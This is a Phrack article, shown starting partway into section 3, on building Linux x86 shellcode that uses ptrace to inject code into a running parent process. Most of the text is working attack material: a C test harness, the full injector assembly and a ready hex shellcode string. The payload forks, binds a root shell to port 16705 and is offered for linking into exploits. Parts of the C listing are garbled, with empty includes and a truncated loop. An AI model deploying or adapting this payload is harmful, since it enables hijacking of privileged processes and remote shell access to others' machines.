                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3b, Phile #0x0c of 0x12

|=---------------=[ Building ptrace injecting shellcodes ]=--------------=|
|=-----------------------------------------------------------------------=|
|=------------=[ anonymous author


   long int ptrace(enum __ptrace_request request, pid_t pid,
                   void * addr, void * data)

'request' is a symbolic constant declared in sys/ptrace.h. We shall use
these :

PTRACE_ATTACH :
   Attach to the process pid.

PTRACE_DETACH :
   ugh, Detach from the process pid. Never forget to do that, or your
   traced process will stay in stopped mode, which is unrecoverable
   remotely.

PTRACE_GETREGS :
   This command copies the process registers into the struct pointed to
   by data (addr is ignored). This structure is struct user_regs_struct,
   defined like this in asm/user.h :

   struct user_regs_struct {
           long ebx, ecx, edx, esi, edi, ebp, eax;
           unsigned short ds, __ds, es, __es;
           unsigned short fs, __fs, gs, __gs;
           long orig_eax, eip;
           unsigned short cs, __cs;
           long eflags, esp;
           unsigned short ss, __ss;
   };

PTRACE_SETREGS :
   This command is the opposite of PTRACE_GETREGS, with the same
   arguments.

PTRACE_POKETEXT :
   This command writes the 32-bit word passed in data (the value itself,
   not a pointer to it) at address addr in the traced process. It is
   equivalent to PTRACE_POKEDATA.

An important thing when you attach to a pid is that you have to wait for
the traced process to be stopped, and so have to wait for the SIGCHLD
signal. wait(NULL) does this perfectly (implemented in the shellcode by
waitpid).

  3.2 - How does the library make the call

As we are writing asm code, we have to know how to call the ptrace system
call directly. A few little tests show how the library wraps the syscall.
It is simply :

   eax is SYS_ptrace (26 decimal)
   ebx is request (e.g. PTRACE_ATTACH is 16)
   ecx is pid
   edx is addr
   esi is data

On error, the kernel returns a negative errno value in eax (for example
-1, that is -EPERM, when the attach is refused). The library wrapper is
what turns this into a -1 return value plus errno.

---[ 4 - Injecting code in a process - C code

  4.1 - The stack is our friend

I've seen some injection mechanisms used by some ptrace() exploits for
linux, which injected a standard shellcode into the memory area pointed
to by %eip. That's the lazy way of doing injection, since the target
process is screwed up and can't be used again. (crashes or doesn't fork)

We have to find another way to execute our code in the target process.
That's what I was thinking about, and I found this :

   1- Get the current eip of the process, and the esp.
   2- Decrement esp by four
   3- Poke eip address at the esp address.
   4- Inject the shellcode into esp - 1024 address (Not directly before
      the space pointed by esp, because some shellcodes use the push
      instruction)
   5- Set register eip as the value of esp - 1024
   6- Invoke the SETREGS method of ptrace
   7- Detach the process and let it open a root shell for you :)

This method does not work on systems with a non-executable stack, because
the shellcode is uploaded onto the stack. That's a /feature/, not a bug.

I've heard of methods saving the memory context of the traced process,
uploading the shellcode, waiting for it to finish (usually after the
fork) and then restoring the old state of the traced process. That's a
way, but I don't think it is really efficient because modern non-exec
patches also avoid ptracing of unrestricted processes. (At least grsec
does that.)

The target stack may look like this :

[DOWN][program stack][old_eip][craps for 1024 bytes][shellcode][UP]
                     ^> Original esp points here
                                            new eip<^
                          new<^>esp points here

Something important to do before the exploitation is to put two nop bytes
before the shellcode. The reason is simple : if ptrace has interrupted a
syscall being executed, the kernel will subtract two bytes (the length of
the int $0x80 instruction) from eip after the PTRACE_DETACH to restart
the syscall.

  4.2 - Code to inject

The code to inject has to work peacefully with the stack we have set up
for it : it may fork(), and let the original process continue its job.
The new process may launch a bindshell !

Here's the code of s1.S, compilable with gcc :

/* all that part has to be done into the injected process */
/* in other word, this is the injected shellcode */
.globl injected_shellcode
injected_shellcode:
        // ret location has been pushed previously
        nop
        nop
        pusha                   // save before anything
        xor %eax,%eax
        mov $0x02,%al           //sys_fork
        int $0x80               //fork()
        xor %ebx,%ebx
        cmp %eax,%ebx           // father or son ?
        je son                  // I'm son
        //here, I'm the father, I've to restore my previous state
father:
        popa
        ret     /* return address has been pushed on the stack previously */
        // code finished for father
son:    /* standard shellcode, at your choice */
.string ""

local@darkside:~/dev/ptrace$ gcc -c s1.S

Explanations :

The first two nops are the nops I've discussed just before, because in my
final shellcode I chose to decrement the destination address of the
buffer by two.

The pusha saves all the registers on the stack, so the process may
restore them just after the fork. (I mean eax and ebx)

If the return value of fork is zero, this is the son being executed.
There we insert any style of shellcode.

If the return value is not zero (but a pid), restore the registers and
the previously saved eip. The program may continue as if nothing has
happened.

  4.3 - Our first C code

Lots of theory, now a little practical example. Here is a program which
will fork, attach to its son, inject the code into it, let it run and
then kill it.

So, there is p2.c :

#include
#include
#include
#include

typedef long int pid_t;
void injected_shellcode();
char *hello_shellcode=
"\x31\xc0\xb0\x04\xeb\x0f\x31\xdb\x43\x59"
"\x31\xd2\xb2\x0d\xcd\x80\xa1\x78\x56\x34"
"\x12\xe8\xec\xff\xff\xff\x48\x65\x6c\x6c"
"\x6f\x2c\x57\x6f\x72\x6c\x64\x20\x21"
; /* Prints hello. What a deal !
*/ char *shellcode; int child(){ while(1){ write(2,".",1); sleep(1); } return 0; } int father (pid_t pid){ int error; int i=0; int ptr; int begin; struct user_regs_struct data; if (error=ptrace(PTRACE_ATTACH,pid,NULL,NULL)) perror("attach"); waitpid(pid,NULL,0); if(error=ptrace(PTRACE_GETREGS,pid,&data,&data)) perror("getregs"); printf("%%eip : 0x%.8lx\n",data.eip); printf("%%esp : 0x%.8lx\n",data.esp); data.esp -= 4; ptrace(PTRACE_POKETEXT,pid,data.esp,data.eip); ptr=begin=data.esp-1024; printf("Inserting shellcode into %.8lx\n",begin); data.eip=(long)begin+2; ptrace(PTRACE_SETREGS,pid,&data,&data); while(i1) pid=atoi(argv[1]); shellcode=malloc( strlen((char*) injected_shellcode) + strlen(hello_shellcode) + 4); strcpy(shellcode,(char *) injected_shellcode); strcat(shellcode,(char *) hello_shellcode); printf("p2 : trying to launch shellcode on forked process\n"); if(pid==0) pid=fork(); if (pid){ printf("I'm the father\n"); sleep(2); father(pid); sleep(2); kill(pid,9); wait(NULL); }else{ printf("I'm the child\n"); child(); } return 0; } Compile all that with gcc -o p2 p2.c s1.S and admire my cut & paste skillz local@darkside:~/dev/ptrace$ ./p2 p2 : trying to launch shellcode on forked process I'm the father I'm the child ...%eip : 0x400c0a11 %esp : 0xbffff470 Inserting shellcode into bffff06c .Hello,World !. It really happened. the .... process forked and then printed "Hello, world!". 5 - First try to shellcodize it Before doing it, we have to remember our rules. I'll program it without really optimizing it in size (I let bighawk or pr1 do that) but designing with pre-compiler conditional assemble. gcc -DLONG for a very careful shellcode (checks etc...) gcc -DSHORT for a very tiny shellcode (which does the minimum but unsafe). So, if size really matters, we can exit(0) simply by jumping anywhere, or if size does not matter at all, we can make draconian tests. I will use at&t syntax, compilable with gcc. 
If you don't like it, a good (and big) awk script may do the trick.

  5.1 When you need somebody to trace

A basic approach is first to set the stack pointer to a high value. We
can't be certain that the stack pointer is not less than the current eip
(in the case of a stack based overflow). The easiest (and laziest) way to
do this is to set esp to 0xbffffe04. This esp value works on nearly all
linux/x86 boxes I've seen, and is near the stack bottom, but not too
much, and doesn't contain a zero.

Then, we get the parent pid with the getppid() syscall.

Next, we first try to attach to it. If the attach fails, chances are 99%
that the ppid is init. In this case, we increment the pid until we can
attach to something.

(Warning, debugging this part of the code is not easy at all. When you
trace a process, you become its ppid. In this case, the shellcode will
attach to your debugger and a mutual deadlock will appear. Who said "A
cool/good anti-debugger technique ?")

So I included a test for the DEBUG_PID preprocessor variable. Put there
whatever pid you want to inject something in.

Note that the pid is put on the stack, at 12(%ebp). That's useful because
we will need it in nearly all system calls.

  5.2 Waiting (for love ?)

Now, the little shellcode has to wait for its child. There are two ways
of doing this :

   - waitpid(pid,NULL,NULL);
   - big big loop;

As I did not manage to write a loop that is both reasonably short (in
time) and smaller in size than the syscall, the code contains only the
system call.

  5.3 Registers where are you ?

The target process is ready to be modified, but the first thing to do
with it is to extract the registers. The ebp register is copied into esi,
and then esi is incremented by 16. It will be the "data" argument of the
ptrace call.

So, after the syscall, the target registers begin at 16(%ebp).
Interesting registers are :

   esp : 76(%ebp)
   eip : 64(%ebp)

The register tricks I have described before are in the shellcode source,
and are not so complicated, including the "push"-like sequence which
pushes the old eip address.

  5.4 Upload in progress

"Uploading" the shellcode, or injecting it in the target process, is just
a little loop. The shellcode itself is not really clear because the loop
counter used is esp.

We set esp to the value specified in the macro SHELLCODELEN. In edi, we
put the memory address of the injected shellcode in the current process.
Edx contains the target address, previously decremented by two as
explained in the note about the two nops in 4.1.

Since eax must be zero after each successful int $0x80, we can safely
compare it with esp to test whether the counter has reached zero.

  5.5 You'll be a man, my son.

We can safely detach the process now. If we forget to detach (out of
laziness or simply lack of space), the process will remain in the stopped
state, and needs a SIGCONT to launch our bindshell.

After this hard work, the shellcode can exit, simply by the exit()
syscall, which usually doesn't alarm inetd or such and doesn't create any
alarming note in syslog. (for the cute version, "ret" may be enough to
segfault and so close the process.)

The bindshell I included binds port 0x4141. Remember that two fast
executions of the shellcode may block the port 0x4141 for minutes. That
was quite annoying while coding this.

The shellcode hasn't been optimized in size yet. You can compile the
attached code with

   gcc -DLONG -c -o injector.o injector.S

and link it with your favourite exploit.

Code is 100% null-chars free. I didn't look for newlines, carriage
returns, spaces, percents, 0xff, etc...

---[ 6 - References and greetings

The man page of ptrace() is cool, lucid, informative, and so on.

Intel documentation book 2 : the instructions was a useful book full of
1-byte-instructions-which-do-everything.
Special greets to the other guys from minithins.net, UNF people, my tender girlfriend and to at&t who made their own cool asm syntax. Special thanks too to the channels #fr,#ircs,#!w00nf,#segfault,#unf for their special support, and especially to double-p ,fozzy and OUAH who corrected my lame english and gave me some advices. /* INJECTOR.S VERSION 1.0 */ /* Injects a shellcode in a process using ptrace system call */ /* Tested on : linux 2.4.18 */ /* NOT SIZE-OPTIMIZED YET */ #define SHELLCODELEN 30 /* That is, size of (the injected shellcode + bindshell)/4 */ #ifndef SHORT #define LONG #endif #ifdef LONG #undef SHORT #endif .text .globl shellcode .type shellcode,@function shellcode: /* injector begins here */ mov $0xbffffe04,%esp /* first thing, we have to find our ppid */ xor %eax,%eax mov $64,%al /* sys_getppid */ int $0x80 #ifdef DEBUG_PID mov $DEBUG_PID,%ax #endif /* put it on the stack */ mov %esp,%ebp /* save the stack in stack pointer */ mov %eax,12(%ebp) /* save the pid there */ /* now we have to do a ptrace */ redo: xor %eax,%eax mov $26,%al /* sys_ptrace */ mov 12(%ebp),%ecx mov %eax,%ebx mov $0x10,%bl /* PTRACE_ATTACH */ int $0x80 /* do ptrace(PTRACE_ATTACH,getppid(),NULL,NULL); */ xor %ebx,%ebx cmp %eax,%ebx je good /* we are not leet enough, or ppid is init */ inc %ecx mov %ecx,12(%ebp) jmp redo good: /* now we have to do a waitpid(pid,NULL,NULL) */ mov %eax,%edx /* NULL */ mov %ecx,%ebx /* pid */ mov %edx,%ecx /* NULL */ mov $7,%al /* SYS_waitpid */ int $0x80 getregs: /* now get its registers */ xor %eax,%eax /* Should waitpid return 0 ? never ;) */ xor %ebx,%ebx mov %ebp,%esi add $16,%esi /* 16 up of the stack pointer */ mov $12,%bl /* %ebx is zero, PTRACE_GETREGS */ mov 12(%ebp),%ecx /* pid */ mov $26,%al /* %eax is zero. 
*/ /* %edx doesn't contain anything since PTRACE_GETREGS doesn't use addr */ int $0x80 /* so now we have registers in 16(%ebp) */ /* two interresting : %eip and %esp */ /* %eip : (16+48)(%ebp) */ /* %esp : (16+60)(%ebp) */ /* rq : 12(%ebx) contains ppid */ /* 8(%ebx) will contain the eip */ custom_push: sub $4,76(%ebp) /* dec the esp */ mov 76(%ebp),%edi /* put it in our temp eip */ sub $1036,%di mov %edi,8(%ebp) /* that's the address where we */ /* shall start to install our code */ /* we need to push the eip at top of the stack */ mov $26,%al mov $4,%bl /* PTRACE_POKETEXT*/ mov 12(%ebp),%ecx /*ppid */ mov 76(%ebp),%edx /* esp we have decremented */ mov 64(%ebp),%esi /* old eip */ int $0x80 /* what a work for push %eip */ mov %edi ,64(%ebp) /* eip = our code nah, %edi == 8(%ebp) */ /* now put our cool registers set */ setregs: xor %eax,%eax xor %ebx,%ebx mov $26,%al mov $13,%bl /* PTRACE_SETREGS*/ /* ppid always set so %ecx */ /* %edx ignored */ mov %ebp,%esi add $16,%esi int $0x80 /* registers have been updated. now inject the shellcode */ /* %edi : location in memory where we put the shellcode */ jmp start goback: /* push on the stack the address of the shellcode to inject */ mov %edi,%edx /* addr */ dec %edx dec %edx /* returning from syscall, eip goes 2 before current eip */ /* with this trick, it goes on 2 nops */ pop %edi /* data */ xor %eax,%eax mov $SHELLCODELEN,%al mov %eax,%esp mov $4,%bl loop: mov $26,%al mov 12(%ebp),%ecx mov (%edi),%esi int $0x80 dec %esp add $4,%edx /* target shellcode */ add $4,%edi /* local shellcode, source */ cmp %esp,%eax /* Len > 0 ? 
*/ jne loop detach: mov $26,%al xor %ebx,%ebx mov $0x11,%bl /* PTRACE_DETACH */ mov 12(%ebp),%ecx /* pid */ //xor %edx,%edx //xor %esi,%esi int $0x80 /* Now we can exit */ failed: #ifdef LONG xor %eax,%eax /* exit silently */ mov %eax,%ebx mov $1,%al /* sys_exit */ int $0x80 /* die in peace, poor child */ #endif #ifndef LONG ret #endif start: call goback /* all that part has to be done into the injected process */ /* in other word, this is the injected shellcode */ // ret location has been pushed previously nop nop pusha // save before anything by saving registers xor %eax,%eax mov $0x02,%al //sys_fork int $0x80 //fork() xor %ebx,%ebx cmp %eax,%ebx // father or son ? je son // I'm son //here, I'm the father, I've to restore my previous state father: popa ret /* code finished for the father */ son: /* standard shellcode, at your choice */ /* Bind shellcode */ lnx_bind: xor %eax,%eax cdq /* %edx= 0 */ push %edx /* IPPROTO_TCP */ inc %edx /* SOCK_STREAM */ mov %edx,%ebx /* socket() */ push %edx inc %edx /* AF_INET */ push %edx mov %esp,%ecx mov $102,%al int $0x80 mov %eax,%edi /* Save the socket in %edi */ cdq /* %edx= sign of %eax = 0 */ inc %ebx /* bind */ /* was 1, become 2 */ push %edx /* 0.0.0.0 addr */ /*change \/ here */ push $0x4141ff02 /* here, change the 0x4141 for the port */ /* /\ */ mov %esp,%esi /* save the address of sockaddr in %esi */ push $16 /* Size of this shit */ //$16 push %esi /* struct sockaddr * */ push %edi /* socket number */ mov %esp,%ecx /* bind() */ mov $102,%al int $0x80 /* Erf, I use the previous data on the stack, they are even good enough */ inc %ebx /*3...*/ inc %ebx /*4 */ mov $102,%al int $0x80 /* Listen(fd,somehug) (somehuge always > 0 so it's good) */ push %esp /* Len */ push %esi /* sockaddr* */ push %edi /* socket */ inc %ebx /* 5 */ mov %esp,%ecx mov $102,%al int $0x80 /* accept */ xchg %eax,%ebx /* Save our precious file descriptor */ pop %ecx /* take the value of %edi, that's usualy %ebx-1 */ duploop: mov $63,%al /* dup2 */ 
int $0x80 dec %ecx cmp %ecx,%edx jle duploop //jnl loop /* For each file descriptor before %ebx, dup2() it */ /* Std lnx_bin_sh_1 shellcode */ push %edx push $0x68732f6e push $0x69622f2f mov %esp,%ebx push %edx push %ebx mov %esp,%ecx mov $11, %al int $0x80 .string "" // compiled with -DLONG // binds to port 16705 char injector_lnx[]= "\xbc\x04\xfe\xff\xbf\x31\xc0\xb0\x40\xcd" "\x80\x89\xe5\x89\x45\x0c\x31\xc0\xb0\x1a" "\x8b\x4d\x0c\x89\xc3\xb3\x10\xcd\x80\x31" "\xdb\x39\xc3\x74\x06\x41\x89\x4d\x0c\xeb" "\xe7\x89\xc2\x89\xcb\x89\xd1\xb0\x07\xcd" "\x80\x31\xc0\x31\xdb\x89\xee\x83\xc6\x10" "\xb3\x0c\x8b\x4d\x0c\xb0\x1a\xcd\x80\x83" "\x6d\x4c\x04\x8b\x7d\x4c\x66\x81\xef\x0c" "\x04\x89\x7d\x08\xb0\x1a\xb3\x04\x8b\x4d" "\x0c\x8b\x55\x4c\x8b\x75\x40\xcd\x80\x89" "\x7d\x40\x31\xc0\x31\xdb\xb0\x1a\xb3\x0d" "\x89\xee\x83\xc6\x10\xcd\x80\xeb\x34\x89" "\xfa\x4a\x4a\x5f\x31\xc0\xb0\x1e\x89\xc4" "\xb3\x04\xb0\x1a\x8b\x4d\x0c\x8b\x37\xcd" "\x80\x4c\x83\xc2\x04\x83\xc7\x04\x39\xe0" "\x75\xec\xb0\x1a\x31\xdb\xb3\x11\x8b\x4d" "\x0c\xcd\x80\x31\xc0\x89\xc3\xb0\x01\xcd" "\x80\xe8\xc7\xff\xff\xff\x90\x90\x60\x31" "\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xc3\x74" "\x02\x61\xc3\x31\xc0\x99\x52\x42\x89\xd3" "\x52\x42\x52\x89\xe1\xb0\x66\xcd\x80\x89" "\xc7\x99\x43\x52\x68\x02\xff\x41\x41\x89" "\xe6\x6a\x10\x56\x57\x89\xe1\xb0\x66\xcd" "\x80\x43\x43\xb0\x66\xcd\x80\x54\x56\x57" "\x43\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0" "\x3f\xcd\x80\x49\x39\xca\x7e\xf7\x52\x68" "\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89" "\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" ; /*size :279 */